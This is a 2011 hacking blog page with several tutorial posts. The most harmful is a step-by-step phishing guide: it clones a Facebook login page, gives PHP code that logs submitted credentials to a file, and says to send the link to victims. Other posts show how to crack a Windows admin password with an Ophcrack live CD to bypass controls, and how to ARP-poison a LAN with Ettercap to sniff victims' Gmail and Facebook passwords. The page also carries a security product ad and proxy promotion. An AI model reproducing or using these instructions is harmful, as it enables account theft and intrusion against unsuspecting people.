Now you all can invite me on skype for any kind of help required as my username is krackoworld


22 August 2011

Check Website Whether it is Down or Not ?


downornotTo perform Web Hacking it is very essential to first check whether the site is in up or down state for further action like DOS, SQL injection, RFI’s, MetaSploit, Man in the Middle attacks, Cross site scripting-XSS etc... because if it is already in down state then it is more easier to get sensitive information out of it. Hence a site named www.DownorNot.com which tells us that whether a site or blog is in down or up condition by taking its server and existence in different countries into consideration. Below is a screenshot of it. Enjoy!

screenshot

Kindly join our mailing list by clicking here and get cool tuts.


19 August 2011

Crack Windows Password Easily Via Ophcrack


Now a days cracking Windows admin’s password is just like playing the games of children because many software's and sites comes into action to do this. Therefore today I going to teach you how to crack windows passwords using Ophcrack by just installing software or by running a live bootable cd also. So first let me clear you that Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms. Note- This process mainly works on Windows Vista or XP only.

Features -

  • Runs on Windows, Linux/Unix, Mac OS X and much more.
  • Cracks LM and NTLM hashes also.
  • Free tables available for Windows XP and Vista.
  • Brute-force module for simple passwords.
  • Audit mode & CSV export.
  • Real-time graphs to analyze the passwords.
  • LiveCD available to simplify the cracking.
  • Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
  • Free and open source software (GPL) etc..

Steps Needed to do -


Step 1: Go to ophcrack.sourceforge.net select Windows Vista or XP and download the ISO file. After the download is complete burn the ISO to a CD or DVD.
Download
Step 2: Restart your computer (with the CD in) and your computer should now boot from the live CD into a Linux environment.
Step 3: Ophcrack will automatically run as soon as the CD boots and now all you need to do is wait until Ophcrack has completely finished cracking the computer password(s). This process will take anywhere from 10 minutes to several hours depending on the strength of the password used to protect the computer.

Here is the screenshot of it -

Step 4: Finally now that you know the computer password; reboot the computer, eject the CD and enter in the password.

That's it! Now you'll have complete access to everything on the admin’s computer by knowing his/her password and you can go ahead and remove parental controls or do whatever you'd like.

If anyone have some problem regarding it then plz Comment below.


14 August 2011

Performing Man in the Middle Attack Using Ettercap


Last night one of the reader of my blog has asked me to write an detailed post on Man in the Middle attack so I deeply searched on Google and brought to the following results below- The man-in-the-middle attack (also known as a bucket-brigade attack and abbreviated
MITM) is a form of active eavesdropping  in which the attacker makes independent  connections with the victims and relays messages between them, making them believe
that they are talking directly to each other over a private connection when in fact the
entire conversation is controlled by the attacker.

Brief description of Ettercap

Ettercap is a suite for man in the middle attacks on LAN (local area network ). It features sniffing of live connections, content filtering on the fly and many other interesting tricks.It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. In this tutorial i will explain how to sniff (user names,passwords) in LAN using Ettercap.

Man in the Middle Attack Using Ettercap :

1. First of all download Ettercap From Here

2. After installation it open Ettercap , select sniff mode and select your network interface

3. Now scan for hosts in your sub net  by going to Hosts ---> scan for hosts

4.
Now open host list from hosts tab and select the IP address of the victim as target 1 and IP address of the router as target 2 respectively.

5.
Now start ARP poisoning by going to mitm ---> ARP Poisoning. Note- ARP Poisoning is a technique used to attack an Ethernet wired or wireless network and sniff some data frames on a local area network (LAN).

6.
Finally start the sniffer by going to start ---> start sniffing . Now if victim logs into Gmail , face book yahoo mail...etc. .we will get the user name and password.

Done !


13 August 2011

Learn How to Make a Phishing Page for any Website


fake login pageAs I mention earlier in my previous posts that Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. This is similar to Fishing, where the fisherman puts a bait at the hook, thus, pretending to be a genuine food for fish. But the hook inside it takes the complete fish out of the lake. Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Around 50% of the accounts in todays world is get hacked by this process.. that is why Phishing is considered as the simplest and easiest way of Hacking someone sensitive information. Below is the complete tutorial on it.

How to make a Phisher or Phishing/Fake Page:

1. First Open any website which you want to make phisher/ fake login page.

for eg : Facebook.com
2. Now do right click and save the page.
3. Then open that page in notepad, search for "action = http://" and change the following address to login.php and also change method = " Post" to "GET" and hit save.
 

4. After editing save the page as "index.html"
5. Now its time to create login.php . Open any blank notepad and copy/paste this below code and save it as login.php

header ('Location: http://google.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Note :- By default the victim will be redirected to google.com once he clicks login ,If you want you can change the address you can do it by changing the www.google.com to any address you want.

6. Now create a simple and empty text file in notepad and save it as log.txt

7. Now create your own free web hosting account at my3gb.com or 110mb.com or 000webhost.com and upload all the three files.

8. Upload Index.html , login.php , log.txt we created in the above steps.

9. We are done, our phisher / fake login page is ready to use….

How to Hack Accounts ?

Send the index.html (the uploaded one) link to your victim , once he/she will enter his/her information and do login with our fake login page, then every thing will be stored in the log.txt file placed in your hosting account, now open log.txt to see all the Login details.

Its very simple to create phisher/fake login page for any website, Here i have taken the example of Facebook Phisher . But in this same you can also create the phisher of many websites like yahoo, Gmail, orkut etc..

If you face any problem then please tell me by commenting. Have Fun !


Modem Hacking and Its Security


modemModem hacking isn't a high profile security concern, but it represents a significant threat to both voice network and data networks. Modem hacking uses easy-to-acquire software to dial up every extension in a corporate voice network in order to find modems that have been left unsecured. A successful attack will identify one or more modems that give unauthorized individuals back door access to the corporate voice network. From there, all manner of threats can be launched to bring down the voice network and the data network. For solutions to prevent modem hacking, consider the ETM System® version 5.0 from SecureLogix®.

SecureLogix solves modem hacking problems for companies worldwide.

The SecureLogix Corporation has designed the ETM System to be a scalable and cost-effective telephony management solution that includes protection against modem hacking. It combines security applications with call accounting and performance management tools to provide the telephony manager with an integrated approach to fending off threats. The ETM System is helping solve modem hacking and other security issues for customers in practically every business vertical. At this time, the number of phone lines around the world protected by SecureLogix solutions exceeds one-half million.

Integrated security, performance and management applications:

The appeal of the ETM System 5.0 is not only in its effectiveness, but its ease of management as well. The solution is appliance based and features several applications that are both powerful and easy to use, reducing administrative burden while improving security for issues like modem hacking.

The front line protection is offered by Voice Firewall, a firewall designed specifically for voice networks, to detect and block attacks like modem hacking, toll fraud, unauthorized use, service abuse, and more. Voice IPS, an intrusion prevention system, offers additional security by alerting telecom managers in real-time when suspicious activity is occurring. The system also includes Call Recorder, which provides automatic recording of targeted calls.

The ETM System provides telecom managers with extraordinary call accounting capabilities. Usage Manager gives administrators a clear vision of system usage trends & can be helpful in identifying parts of the voice network that are vulnerable to modem hacking and other threats.

The Performance Manager provides a real-time look into the health of the voice network and the status of service. Because all current traffic can be viewed on a single console, Performance Manager gives telecom managers yet another tool for identifying and blocking threats.

……………………………………………………………………………………………………………………………………………………………


06 August 2011

Download BackTrack 5.0


backtrack5Well I thing all of you are aware of backTrack- An Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Since last month its new version means BackTrack 5 has been launched with full fixture in the bugs and security tools. This new revision has been built from scratch, and has several significant improvements in all our previous Ubuntu LTS releases.Based lucid. Kernel 2.6. 38, patched with all relevant wireless injection patches. Fully open source and compatible with GPL also. For more information, visit its official website.

History

The BackTrack distribution originated from the merger of two formerly competing distributions which focused on penetration testing:

  • WHAX: a Slax based Linux distribution developed by Mati Aharoni, a Moroccan security consultant.
  • Auditor Security Collection: a Live CD based on Knoppix developed by Max Moser which included over 300 tools organized in a user-friendly hierarchy.

Tools

BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well known security tools including:

  • Metasploit integration
  • RFMON Injection capable wireless drivers
  • Kismet
  • Nmap
  • Wireshark (formerly known as Ethereal)
  • Hydra
  • Ophcrack
  • BeEF (Browser Exploitation Framework)
  • Ettercap
  • Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with telnet/enable default password.
  • Quypt (Terminal Emulator) (which is private software by Crimson Hacking group, which has leaked to the Mainstream) Blackhat
  • A large collection of exploits as well as more commonplace software such as browsers.

Download Here


05 August 2011

Surf Web Anonymously With KProxy- An Online IP Hider Site


kproxyHiding IP address is one of the major problems today to safeguard us form hackers, Cyberoam and much more etc.. So for this, there are many software's available on the internet for hiding our IP address but the only thing lacked in that they are not easy to install and use plus time consuming. Hence i have come across a powerful site or server named as KProxy which is helping hundreds of thousands of people daily protecting their privacy and identity online and giving access to censored sites since 2005. KProxy.com is the most reliable and fastest free anonymous web proxy in internet.
Most free proxies don't work with sites such as Facebook, Gmail, etc., but KProxy does. Https protocol is supported and downloads are allowed. Also, if a website does not seem to be working with our free proxy you can post in our forum and we'll do our best to fix it.Hide behind our IP address, access blocked websites and protect your identity also. Enjoy free surfing!

Procedure to Use it

All you have to open www.kproxy.com, enter a site you want to surf anonymously in the big box(for help see below Screenshot) and then click surf button.
Surfing

Note- If you are a regular user of this site, then you can also purchase some private server by just paying $0.16 per day to enjoy worlds best surfing without getting detected or server overloading.

That’s it !


 

Recent Posts

Recent Comments

| KrackoWorld (KoW) © 2014. All Rights Reserved | Style By All Web Designing | | Contact |